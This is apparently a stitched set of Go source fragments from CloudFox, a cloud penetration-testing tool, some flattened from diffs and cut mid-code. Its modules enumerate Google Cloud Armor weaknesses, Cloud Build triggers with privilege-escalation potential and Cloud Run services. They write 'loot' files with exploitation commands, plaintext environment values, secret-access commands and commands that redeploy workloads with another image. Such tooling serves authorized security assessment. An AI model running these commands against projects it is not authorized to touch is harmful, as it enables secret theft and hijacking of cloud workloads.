"gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + 
package commands

import (
	"context"
	"fmt"
	"strings"
	"sync"

	cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService"
	"github.com/BishopFox/cloudfox/globals"
	"github.com/BishopFox/cloudfox/internal"
	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
	"github.com/spf13/cobra"
)

// GCPCloudArmorCommand enumerates Cloud Armor security policies and flags
// weaknesses such as preview-only rules and unprotected load balancers.
var GCPCloudArmorCommand = &cobra.Command{
	Use:     globals.GCP_CLOUDARMOR_MODULE_NAME,
	Aliases: []string{"armor", "waf", "security-policies"},
	Short:   "Enumerate Cloud Armor security policies and find weaknesses",
	Long: `Enumerate Cloud Armor security policies and identify misconfigurations.

Cloud Armor provides DDoS protection and WAF (Web Application Firewall) capabilities
for Google Cloud load balancers.

Security Relevance:
- Misconfigured policies may not actually block attacks
- Preview-only rules don't block, just log
- Missing OWASP rules leave apps vulnerable to common attacks
- Unprotected load balancers have no WAF protection

What this module finds:
- All Cloud Armor security policies
- Policy weaknesses and misconfigurations
- Rules in preview mode (not blocking)
- Load balancers without Cloud Armor protection
- Missing adaptive protection (DDoS)`,
	Run: runGCPCloudArmorCommand,
}

// ------------------------------
// Module Struct
// ------------------------------

// CloudArmorModule aggregates per-project enumeration results. The mutex
// guards all fields below it because processProject runs per project via
// RunProjectEnumeration and may execute concurrently.
type CloudArmorModule struct {
	gcpinternal.BaseGCPModule

	Policies       []cloudarmorservice.SecurityPolicy
	UnprotectedLBs map[string][]string // projectID -> LB names
	LootMap        map[string]*internal.LootFile
	mu             sync.Mutex
}

// ------------------------------
// Output Struct
// ------------------------------

// CloudArmorOutput implements the CloudfoxOutput interface consumed by
// internal.HandleOutputSmart.
type CloudArmorOutput struct {
	Table []internal.TableFile
	Loot  []internal.LootFile
}

func (o CloudArmorOutput) TableFiles() []internal.TableFile { return o.Table }
func (o CloudArmorOutput) LootFiles() []internal.LootFile   { return o.Loot }

// ------------------------------
// Command Entry Point
// ------------------------------

// runGCPCloudArmorCommand wires the cobra invocation into the module:
// it builds the command context, initializes loot files, and executes.
func runGCPCloudArmorCommand(cmd *cobra.Command, args []string) {
	cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDARMOR_MODULE_NAME)
	if err != nil {
		// InitializeCommandContext reports its own errors; nothing to do here.
		return
	}

	module := &CloudArmorModule{
		BaseGCPModule:  gcpinternal.NewBaseGCPModule(cmdCtx),
		Policies:       []cloudarmorservice.SecurityPolicy{},
		UnprotectedLBs: make(map[string][]string),
		LootMap:        make(map[string]*internal.LootFile),
	}

	module.initializeLootFiles()
	module.Execute(cmdCtx.Ctx, cmdCtx.Logger)
}

// ------------------------------
// Module Execution
// ------------------------------

// Execute enumerates every in-scope project, summarizes findings
// (weak policies and unprotected load balancers), and writes output.
func (m *CloudArmorModule) Execute(ctx context.Context, logger internal.Logger) {
	m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDARMOR_MODULE_NAME, m.processProject)

	// Count unprotected LBs
	totalUnprotected := 0
	for _, lbs := range m.UnprotectedLBs {
		totalUnprotected += len(lbs)
	}

	if len(m.Policies) == 0 && totalUnprotected == 0 {
		logger.InfoM("No Cloud Armor policies found", globals.GCP_CLOUDARMOR_MODULE_NAME)
		return
	}

	// Count policies with weaknesses
	weakPolicies := 0
	for _, policy := range m.Policies {
		if len(policy.Weaknesses) > 0 {
			weakPolicies++
		}
	}

	logger.SuccessM(fmt.Sprintf("Found %d security policy(ies), %d with weaknesses, %d unprotected LB(s)",
		len(m.Policies), weakPolicies, totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME)

	if totalUnprotected > 0 {
		logger.InfoM(fmt.Sprintf("[MEDIUM] %d load balancer(s) have no Cloud Armor protection", totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME)
	}

	m.writeOutput(ctx, logger)
}

// ------------------------------
// Project Processor
// ------------------------------

// processProject fetches security policies and unprotected load balancers
// for a single project and folds them into the shared module state.
// Errors are reported but non-fatal; a nil result slice is appended safely.
func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, logger internal.Logger) {
	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Checking Cloud Armor in project: %s", projectID), globals.GCP_CLOUDARMOR_MODULE_NAME)
	}

	svc := cloudarmorservice.New()

	// Get security policies
	policies, err := svc.GetSecurityPolicies(projectID)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME,
			fmt.Sprintf("Could not enumerate Cloud Armor security policies in project %s", projectID))
	}

	// Get unprotected LBs
	unprotectedLBs, err := svc.GetUnprotectedLoadBalancers(projectID)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME,
			fmt.Sprintf("Could not enumerate unprotected load balancers in project %s", projectID))
	}

	m.mu.Lock()
	m.Policies = append(m.Policies, policies...)
	if len(unprotectedLBs) > 0 {
		m.UnprotectedLBs[projectID] = unprotectedLBs
	}

	for _, policy := range policies {
		m.addPolicyToLoot(policy)
	}
	for _, lb := range unprotectedLBs {
		m.addUnprotectedLBToLoot(projectID, lb)
	}
	m.mu.Unlock()
}

// ------------------------------
// Loot File Management
// ------------------------------

// initializeLootFiles seeds the loot map with a static header; entries are
// appended as policies/LBs are discovered.
func (m *CloudArmorModule) initializeLootFiles() {
	m.LootMap["cloudarmor-details"] = &internal.LootFile{
		Name:     "cloudarmor-details",
		Contents: "# Cloud Armor Details\n# Generated by CloudFox\n\n",
	}
}

// addPolicyToLoot appends a human-readable summary of one security policy
// (flags, adaptive protection, attached resources, weaknesses, rules) to
// the details loot file. Caller must hold m.mu.
func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPolicy) {
	// Build flags for special attributes
	var flags []string
	if len(policy.Weaknesses) > 0 {
		flags = append(flags, "HAS WEAKNESSES")
	}

	flagStr := ""
	if len(flags) > 0 {
		flagStr = " [" + strings.Join(flags, "] [") + "]"
	}

	adaptive := "No"
	if policy.AdaptiveProtection {
		adaptive = "Yes"
	}

	resources := "None"
	if len(policy.AttachedResources) > 0 {
		resources = strings.Join(policy.AttachedResources, ", ")
	}

	m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf(
		"# %s%s\n"+
			"Project: %s | Type: %s\n"+
			"Rules: %d | Adaptive Protection: %s\n"+
			"Attached Resources: %s\n",
		policy.Name, flagStr,
		policy.ProjectID, policy.Type,
		policy.RuleCount, adaptive,
		resources,
	)

	// Add weaknesses if any
	if len(policy.Weaknesses) > 0 {
		m.LootMap["cloudarmor-details"].Contents += "Weaknesses:\n"
		for _, weakness := range policy.Weaknesses {
			m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf("  - %s\n", weakness)
		}
	}

	// Add rules
	if len(policy.Rules) > 0 {
		m.LootMap["cloudarmor-details"].Contents += "Rules:\n"
		for _, rule := range policy.Rules {
			preview := ""
			if rule.Preview {
				// Preview rules log matches but do not block traffic.
				preview = " [PREVIEW]"
			}
			m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf(
				"  - Priority %d: %s%s\n"+
					"    Match: %s\n",
				rule.Priority, rule.Action, preview,
				rule.Match,
			)
			if rule.RateLimitConfig != nil {
				m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf(
					"    Rate Limit: %d requests per %d seconds\n",
					rule.RateLimitConfig.ThresholdCount,
					rule.RateLimitConfig.IntervalSec,
				)
			}
		}
	}

	m.LootMap["cloudarmor-details"].Contents += "\n"
}

// addUnprotectedLBToLoot records a load balancer that has no Cloud Armor
// policy attached. Caller must hold m.mu.
func (m *CloudArmorModule) addUnprotectedLBToLoot(projectID, lbName string) {
	m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf(
		"# %s [UNPROTECTED]\n"+
			"Project: %s\n"+
			"No Cloud Armor policy attached\n\n",
		lbName, projectID,
	)
}

// ------------------------------
// Output Generation
// ------------------------------

// writeOutput renders the collected data as table files (policies and
// unprotected backend services) plus loot files, then hands them to
// HandleOutputSmart for project-scoped writing.
func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logger) {
	var tables []internal.TableFile

	// Security policies table
	if len(m.Policies) > 0 {
		header := []string{"Project Name", "Project ID", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"}
		var body [][]string

		for _, policy := range m.Policies {
			adaptive := "No"
			if policy.AdaptiveProtection {
				adaptive = "Yes"
			}

			resources := "-"
			if len(policy.AttachedResources) > 0 {
				resources = strings.Join(policy.AttachedResources, ", ")
			}

			body = append(body, []string{
				m.GetProjectName(policy.ProjectID),
				policy.ProjectID,
				policy.Name,
				policy.Type,
				fmt.Sprintf("%d", policy.RuleCount),
				resources,
				adaptive,
			})
		}

		tables = append(tables, internal.TableFile{
			Name:   "security-policies",
			Header: header,
			Body:   body,
		})
	}

	// Unprotected backend services table
	var unprotectedList []struct {
		ProjectID string
		LBName    string
	}
	for projectID, lbs := range m.UnprotectedLBs {
		for _, lb := range lbs {
			unprotectedList = append(unprotectedList, struct {
				ProjectID string
				LBName    string
			}{projectID, lb})
		}
	}

	if len(unprotectedList) > 0 {
		header := []string{"Project Name", "Project ID", "Backend Service"}
		var body [][]string

		for _, item := range unprotectedList {
			body = append(body, []string{
				m.GetProjectName(item.ProjectID),
				item.ProjectID,
				item.LBName,
			})
		}

		tables = append(tables, internal.TableFile{
			Name:   "unprotected-backend-services",
			Header: header,
			Body:   body,
		})
	}

	// Collect loot files, skipping files that still hold only the header
	// written by initializeLootFiles.
	var lootFiles []internal.LootFile
	for _, loot := range m.LootMap {
		if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") {
			lootFiles = append(lootFiles, *loot)
		}
	}

	output := CloudArmorOutput{
		Table: tables,
		Loot:  lootFiles,
	}

	scopeNames := make([]string, len(m.ProjectIDs))
	for i, projectID := range m.ProjectIDs {
		scopeNames[i] = m.GetProjectName(projectID)
	}

	err := internal.HandleOutputSmart(
		"gcp",
		m.Format,
		m.OutputDirectory,
		m.Verbosity,
		m.WrapTable,
		"project",
		m.ProjectIDs,
		scopeNames,
		m.Account,
		output,
	)
	if err != nil {
		logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME)
		m.CommandCounter.Error++
	}
}
package commands

import (
	"context"
	"fmt"
	"strings"
	"sync"

	cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService"
	"github.com/BishopFox/cloudfox/globals"
	"github.com/BishopFox/cloudfox/internal"
	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
	"github.com/spf13/cobra"
)

// GCPCloudBuildCommand enumerates Cloud Build triggers and recent builds,
// flagging trigger configurations with privilege-escalation potential.
var GCPCloudBuildCommand = &cobra.Command{
	Use:     globals.GCP_CLOUDBUILD_MODULE_NAME,
	Aliases: []string{"cb", "build", "builds"},
	Short:   "Enumerate Cloud Build triggers and builds",
	Long: `Enumerate Cloud Build triggers and recent build executions.

Features:
- Lists all build triggers
- Shows trigger source configuration (GitHub, CSR)
- Identifies service accounts used for builds
- Shows recent build executions
- Detects potentially risky trigger configurations`,
	Run: runGCPCloudBuildCommand,
}

// ------------------------------
// Module Struct with embedded BaseGCPModule
// ------------------------------

// CloudBuildModule aggregates per-project enumeration results. The mutex
// guards the slices and loot map because processProject may run
// concurrently across projects.
type CloudBuildModule struct {
	gcpinternal.BaseGCPModule

	// Module-specific fields
	Triggers         []cloudbuildservice.TriggerInfo
	Builds           []cloudbuildservice.BuildInfo
	SecurityAnalysis []cloudbuildservice.TriggerSecurityAnalysis
	LootMap          map[string]*internal.LootFile
	mu               sync.Mutex
}

// ------------------------------
// Output Struct implementing CloudfoxOutput interface
// ------------------------------
type CloudBuildOutput struct {
	Table []internal.TableFile
	Loot  []internal.LootFile
}

func (o CloudBuildOutput) TableFiles() []internal.TableFile { return o.Table }
func (o CloudBuildOutput) LootFiles() []internal.LootFile   { return o.Loot }

// ------------------------------
// Command Entry Point
// ------------------------------

// runGCPCloudBuildCommand builds the command context, initializes loot
// files, and runs the enumeration.
func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) {
	cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDBUILD_MODULE_NAME)
	if err != nil {
		// InitializeCommandContext reports its own errors; nothing to do here.
		return
	}

	module := &CloudBuildModule{
		BaseGCPModule:    gcpinternal.NewBaseGCPModule(cmdCtx),
		Triggers:         []cloudbuildservice.TriggerInfo{},
		Builds:           []cloudbuildservice.BuildInfo{},
		SecurityAnalysis: []cloudbuildservice.TriggerSecurityAnalysis{},
		LootMap:          make(map[string]*internal.LootFile),
	}

	module.initializeLootFiles()
	module.Execute(cmdCtx.Ctx, cmdCtx.Logger)
}

// ------------------------------
// Module Execution
// ------------------------------

// Execute enumerates every in-scope project, logs a summary, and writes
// table/loot output when anything was found.
func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) {
	m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject)

	if len(m.Triggers) == 0 && len(m.Builds) == 0 {
		logger.InfoM("No Cloud Build triggers or builds found", globals.GCP_CLOUDBUILD_MODULE_NAME)
		return
	}

	logger.SuccessM(fmt.Sprintf("Found %d trigger(s), %d recent build(s)",
		len(m.Triggers), len(m.Builds)), globals.GCP_CLOUDBUILD_MODULE_NAME)

	m.writeOutput(ctx, logger)
}

// ------------------------------
// Project Processor
// ------------------------------

// processProject lists triggers and the 20 most recent builds in a single
// project, runs the privesc analysis per trigger, and folds everything
// into shared state under the mutex.
func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, logger internal.Logger) {
	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Enumerating Cloud Build in project: %s", projectID), globals.GCP_CLOUDBUILD_MODULE_NAME)
	}

	cbSvc := cloudbuildservice.New()

	// Get triggers
	triggers, err := cbSvc.ListTriggers(projectID)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME,
			fmt.Sprintf("Could not enumerate Cloud Build triggers in project %s", projectID))
	}

	// Get recent builds (capped at 20 per project)
	builds, err := cbSvc.ListBuilds(projectID, 20)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME,
			fmt.Sprintf("Could not enumerate Cloud Build builds in project %s", projectID))
	}

	m.mu.Lock()
	m.Triggers = append(m.Triggers, triggers...)
	m.Builds = append(m.Builds, builds...)

	for _, trigger := range triggers {
		m.addTriggerToLoot(trigger)
		// Perform security analysis
		analysis := cbSvc.AnalyzeTriggerForPrivesc(trigger, projectID)
		m.SecurityAnalysis = append(m.SecurityAnalysis, analysis)
		m.addSecurityAnalysisToLoot(analysis)
	}

	// Add build step analysis to loot
	for _, build := range builds {
		m.addBuildToLoot(build)
	}
	m.mu.Unlock()
}

// ------------------------------
// Loot File Management
// ------------------------------

// initializeLootFiles seeds the loot map with a static header; entries are
// appended as triggers and builds are discovered.
func (m *CloudBuildModule) initializeLootFiles() {
	m.LootMap["cloudbuild-details"] = &internal.LootFile{
		Name:     "cloudbuild-details",
		Contents: "# Cloud Build Details\n# Generated by CloudFox\n\n",
	}
}

// addTriggerToLoot appends a summary of one trigger (source, branch/tag,
// config file, service account, flags) to the details loot file.
// Caller must hold m.mu.
func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInfo) {
	// Build flags for special attributes
	var flags []string
	if trigger.PrivescPotential {
		flags = append(flags, "PRIVESC POTENTIAL")
	}
	if trigger.Disabled {
		flags = append(flags, "DISABLED")
	}

	flagStr := ""
	if len(flags) > 0 {
		flagStr = " [" + strings.Join(flags, "] [") + "]"
	}

	sa := trigger.ServiceAccount
	if sa == "" {
		sa = "(default)"
	}

	// A trigger fires on either a branch or a tag filter; show whichever is set.
	branchTag := trigger.BranchName
	if branchTag == "" {
		branchTag = trigger.TagName
	}

	m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(
		"# %s (%s)%s\n"+
			"Project: %s\n"+
			"Source: %s - %s\n"+
			"Branch/Tag: %s | Config: %s\n"+
			"Service Account: %s\n",
		trigger.Name, trigger.ID, flagStr,
		trigger.ProjectID,
		trigger.SourceType, trigger.RepoName,
		branchTag, trigger.Filename,
		sa,
	)
}

// addSecurityAnalysisToLoot appends ready-to-run exploitation commands (if
// the analysis produced any) directly below the trigger's loot entry.
// Caller must hold m.mu.
func (m *CloudBuildModule) addSecurityAnalysisToLoot(analysis cloudbuildservice.TriggerSecurityAnalysis) {
	// Add exploitation commands if available
	if len(analysis.ExploitCommands) > 0 {
		m.LootMap["cloudbuild-details"].Contents += "Exploitation:\n"
		for _, cmd := range analysis.ExploitCommands {
			m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf("  %s\n", cmd)
		}
	}
	m.LootMap["cloudbuild-details"].Contents += "\n"
}

// addBuildToLoot appends a summary of one build (status, trigger, source,
// log location, secret env vars) to the details loot file.
// Caller must hold m.mu.
func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) {
	// Truncate the build UUID to keep the loot readable.
	buildID := build.ID
	if len(buildID) > 12 {
		buildID = buildID[:12]
	}

	m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(
		"# Build: %s\n"+
			"Project: %s | Status: %s\n"+
			"Trigger: %s | Source: %s\n",
		buildID,
		build.ProjectID, build.Status,
		build.TriggerID, build.Source,
	)

	// Log location (note: the gsutil path uses the full build ID)
	if build.LogsBucket != "" {
		m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(
			"Logs: gsutil cat %s/log-%s.txt\n",
			build.LogsBucket, build.ID,
		)
	}

	// Secret environment variables
	if len(build.SecretEnvVars) > 0 {
		m.LootMap["cloudbuild-details"].Contents += "Secret Env Vars:\n"
		for _, secret := range build.SecretEnvVars {
			m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf("  - %s\n", secret)
		}
	}

	m.LootMap["cloudbuild-details"].Contents += "\n"
}

// ------------------------------
// Output Generation
// ------------------------------

// writeOutput renders the collected triggers and builds as table files plus
// loot, logs a pentest hint when privesc-capable triggers exist, and hands
// everything to HandleOutputSmart.
func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logger) {
	// Triggers table
	triggersHeader := []string{
		"Project Name",
		"Project ID",
		"Name",
		"Source",
		"Repository",
		"Branch/Tag",
		"Config File",
		"Service Account",
		"Disabled",
		"Privesc Potential",
	}

	var triggersBody [][]string
	privescCount := 0
	for _, trigger := range m.Triggers {
		disabled := "No"
		if trigger.Disabled {
			disabled = "Yes"
		}

		privesc := "No"
		if trigger.PrivescPotential {
			privesc = "Yes"
			privescCount++
		}

		branchTag := trigger.BranchName
		if branchTag == "" {
			branchTag = trigger.TagName
		}

		sa := trigger.ServiceAccount
		if sa == "" {
			sa = "(default)"
		}

		triggersBody = append(triggersBody, []string{
			m.GetProjectName(trigger.ProjectID),
			trigger.ProjectID,
			trigger.Name,
			trigger.SourceType,
			trigger.RepoName,
			branchTag,
			trigger.Filename,
			sa,
			disabled,
			privesc,
		})
	}

	// Builds table
	buildsHeader := []string{
		"Project Name",
		"Project ID",
		"ID",
		"Status",
		"Trigger",
		"Source",
		"Created",
	}

	var buildsBody [][]string
	for _, build := range m.Builds {
		buildID := build.ID
		if len(buildID) > 12 {
			buildID = buildID[:12]
		}
		buildsBody = append(buildsBody, []string{
			m.GetProjectName(build.ProjectID),
			build.ProjectID,
			buildID,
			build.Status,
			build.TriggerID,
			build.Source,
			build.CreateTime,
		})
	}

	// Collect loot files, skipping files that still hold only the header
	// written by initializeLootFiles.
	var lootFiles []internal.LootFile
	for _, loot := range m.LootMap {
		if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") {
			lootFiles = append(lootFiles, *loot)
		}
	}

	var tables []internal.TableFile

	if len(triggersBody) > 0 {
		tables = append(tables, internal.TableFile{
			Name:   "cloudbuild-triggers",
			Header: triggersHeader,
			Body:   triggersBody,
		})
	}

	if len(buildsBody) > 0 {
		tables = append(tables, internal.TableFile{
			Name:   "cloudbuild-builds",
			Header: buildsHeader,
			Body:   buildsBody,
		})
	}

	if privescCount > 0 {
		logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME)
	}

	output := CloudBuildOutput{
		Table: tables,
		Loot:  lootFiles,
	}

	scopeNames := make([]string, len(m.ProjectIDs))
	for i, id := range m.ProjectIDs {
		scopeNames[i] = m.GetProjectName(id)
	}

	err := internal.HandleOutputSmart(
		"gcp",
		m.Format,
		m.OutputDirectory,
		m.Verbosity,
		m.WrapTable,
		"project",
		m.ProjectIDs,
		scopeNames,
		m.Account,
		output,
	)
	if err != nil {
		logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME)
		m.CommandCounter.Error++
	}
}
[]CloudRunService.ServiceInfo + Jobs []CloudRunService.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudRunOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudRunOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudRunOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDRUN_MODULE_NAME) + if err != nil { + return + } + + module := &CloudRunModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Services: []CloudRunService.ServiceInfo{}, + Jobs: []CloudRunService.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) + + totalResources := len(m.Services) + len(m.Jobs) + if totalResources == 0 { + logger.InfoM("No Cloud Run services or jobs found", globals.GCP_CLOUDRUN_MODULE_NAME) + return + } + + // Count public services + publicCount := 0 + for _, svc := range m.Services { + if svc.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s), %d public", len(m.Services), len(m.Jobs), publicCount), globals.GCP_CLOUDRUN_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s)", len(m.Services), len(m.Jobs)), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// 
------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudRunModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Run in project: %s", projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + cs := CloudRunService.New() + + // Get services + services, err := cs.Services(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) + } else { + m.mu.Lock() + m.Services = append(m.Services, services...) + for _, svc := range services { + m.addServiceToLoot(svc) + } + m.mu.Unlock() + } + + // Get jobs + jobs, err := cs.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run jobs in project %s", projectID)) + } else { + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) 
+ for _, job := range jobs { + m.addJobToLoot(job) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service(s), %d job(s) in project %s", len(services), len(jobs), projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudRunModule) initializeLootFiles() { + m.LootMap["cloudrun-commands"] = &internal.LootFile{ + Name: "cloudrun-commands", + Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["cloudrun-env-vars"] = &internal.LootFile{ + Name: "cloudrun-env-vars", + Contents: "# Cloud Run Environment Variables\n# Generated by CloudFox\n\n", + } + m.LootMap["cloudrun-secret-refs"] = &internal.LootFile{ + Name: "cloudrun-secret-refs", + Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", + } +} + +func (m *CloudRunModule) addServiceToLoot(svc CloudRunService.ServiceInfo) { + // All commands for this service + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "## Service: %s (Project: %s, Region: %s)\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v\n"+ + "# URL: %s\n\n"+ + "# Describe service:\n"+ + "gcloud run services describe %s --region=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud run services get-iam-policy %s --region=%s --project=%s\n"+ + "# List revisions:\n"+ + "gcloud run revisions list --service=%s --region=%s --project=%s\n"+ + "# Invoke the service (if you have run.routes.invoke):\n"+ + "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n"+ + "# Deploy revision (if you have run.services.update):\n"+ + "gcloud run deploy %s --image=YOUR_IMAGE --region=%s --project=%s\n"+ + "# Read container logs (if you have logging.logEntries.list):\n"+ 
+ "gcloud logging read 'resource.type=\"cloud_run_revision\" resource.labels.service_name=\"%s\"' --project=%s --limit=50\n\n", + svc.Name, svc.ProjectID, svc.Region, + svc.ContainerImage, + svc.ServiceAccount, + svc.IsPublic, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.ProjectID, + ) + + // Add environment variables to loot + if len(svc.EnvVars) > 0 { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + for _, env := range svc.EnvVars { + if env.Source == "direct" { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + } else { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) + } + } + m.LootMap["cloudrun-env-vars"].Contents += "\n" + } + + // Add secret references to loot + if len(svc.SecretRefs) > 0 { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + for _, ref := range svc.SecretRefs { + if ref.Type == "env" { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, svc.ProjectID, + ) + } else { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, svc.ProjectID, + ) + } + } + m.LootMap["cloudrun-secret-refs"].Contents += "\n" + } +} + +func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { + // All commands for this job + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Region: %s)\n"+ + "# Image: %s\n"+ + "# 
Service Account: %s\n\n"+ + "# Describe job:\n"+ + "gcloud run jobs describe %s --region=%s --project=%s\n"+ + "# List executions:\n"+ + "gcloud run jobs executions list --job=%s --region=%s --project=%s\n"+ + "# Execute the job (if you have run.jobs.run):\n"+ + "gcloud run jobs execute %s --region=%s --project=%s\n"+ + "# Update job image (if you have run.jobs.update):\n"+ + "gcloud run jobs update %s --image=YOUR_IMAGE --region=%s --project=%s\n\n", + job.Name, job.ProjectID, job.Region, + job.ContainerImage, + job.ServiceAccount, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + ) + + // Add environment variables to loot + if len(job.EnvVars) > 0 { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + for _, env := range job.EnvVars { + if env.Source == "direct" { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + } else { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, 